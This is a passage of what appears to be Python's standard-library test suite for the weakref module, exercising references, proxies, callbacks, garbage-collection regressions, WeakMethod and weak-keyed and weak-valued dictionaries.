# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
        # expect TypeError due to too few args
self.assertRaises(TypeError, ref1)
        # expect TypeError due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
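# A hedged aside on why WeakMethod exists at all (an illustrative sketch, not
# a test; the function name is ours): each attribute access o.some_method
# builds a fresh bound-method object, so a plain weakref to it dies
# immediately, whereas WeakMethod stays usable for as long as both the object
# and the underlying function are alive.
def _weakmethod_motivation_sketch():
    o = Object(1)
    dead = weakref.ref(o.some_method)   # the bound method is trash at once
    gc.collect()
    assert dead() is None
    alive = weakref.WeakMethod(o.some_method)
    assert alive()() == 4               # still resolvable through WeakMethod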
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
        # Test iterating over keyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
        # key iterator, via keys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
        self.assertFalse(values,
                         "values() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
